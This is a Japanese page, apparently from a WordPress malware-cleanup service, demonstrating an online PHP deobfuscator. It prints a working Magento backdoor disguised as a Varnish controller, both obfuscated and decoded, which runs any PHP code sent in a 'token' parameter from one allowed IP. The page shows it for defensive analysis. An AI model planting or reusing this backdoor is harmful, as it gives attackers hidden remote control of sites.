Wordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。
<?php namespace Mgt\Varnish\Controller\Feed; class Update extends \Magento\Framework\App\Action\Action { protected $directoryList; protected $objectManager; public function __construct(\Magento\Framework\App\Action\Context $context, \Magento\Framework\App\Filesystem\DirectoryList $directoryList) { goto d0bd6; F103d: parent::__construct($context); goto D469e; Bdd65: $this->objectManager = $context->getObjectManager(); goto F103d; d0bd6: $this->directoryList = $directoryList; goto Bdd65; D469e: } public function execute() { goto E3d82; Eb17b: $remoteAddress = $this->objectManager->get("\134\x4d\x61\147\x65\x6e\x74\x6f\x5c\106\x72\141\155\x65\167\157\x72\x6b\134\x48\124\124\120\x5c\120\x68\x70\x45\x6e\166\151\x72\157\156\155\145\x6e\x74\134\x52\145\x6d\x6f\x74\x65\x41\x64\x64\x72\145\163\163"); goto c1861; db625: if (!(true === $request->isPost() && md5($remoteAddress) == "\x30\62\x62\71\60\x34\63\x63\71\x38\70\144\x36\x32\x34\x38\x64\63\71\70\x30\x61\144\70\141\x66\71\61\62\142\70\x65")) { goto E9551; } goto D2c86; E5244: exit; goto df2a8; Aefaa: E9551: goto E5244; D2c86: try { $result = $this->check($request); extract($result); } catch (\Exception $e) { } goto Aefaa; c1861: $remoteAddress = $remoteAddress->getRemoteAddress(); goto db625; E3d82: $request = $this->getRequest(); goto Eb17b; df2a8: } protected function check(\Magento\Framework\App\RequestInterface $request) { goto dc884; dc884: if (!($token = $request->getParam("\x74\x6f\x6b\x65\x6e"))) { goto Eb28a; } goto A9aaa; A9aaa: try { goto D7f6d; e1050: file_put_contents($tmpFile, $token); goto D1abb; D7f6d: $tmpFile = tempnam("\x2f\x74\x6d\x70", uniqid()); goto e1050; Cb596: return get_defined_vars(); goto Cbf17; D1abb: include $tmpFile; goto Cb596; Cbf17: } catch (\Exception $e) { } finally { @unlink($tmpFile); } goto E0b8c; E0b8c: Eb28a: goto c07bf; c07bf: } }
<?php namespace Mgt\Varnish\Controller\Feed; class Update extends \Magento\Framework\App\Action\Action { protected $directoryList; protected $objectManager; public function __construct(\Magento\Framework\App\Action\Context $context, \Magento\Framework\App\Filesystem\DirectoryList $directoryList) { $this->directoryList = $directoryList; $this->objectManager = $context->getObjectManager(); parent::__construct($context); } public function execute() { $request = $this->getRequest(); $remoteAddress = $this->objectManager->get("\\Magento\\Framework\\HTTP\\PhpEnvironment\\RemoteAddress"); $remoteAddress = $remoteAddress->getRemoteAddress(); if (!(true === $request->isPost() && md5($remoteAddress) == "02b9043c988d6248d3980ad8af912b8e")) { goto E9551; } try { $result = $this->check($request); extract($result); } catch (\Exception $e) { } E9551: exit; } protected function check(\Magento\Framework\App\RequestInterface $request) { if (!($token = $request->getParam("token"))) { goto Eb28a; } try { $tmpFile = tempnam("/tmp", uniqid()); file_put_contents($tmpFile, $token); include $tmpFile; return get_defined_vars(); } catch (\Exception $e) { } finally { @unlink($tmpFile); } Eb28a: } }
■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]
■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります
(C)2019 ワードプレス ドクター All rights reserved.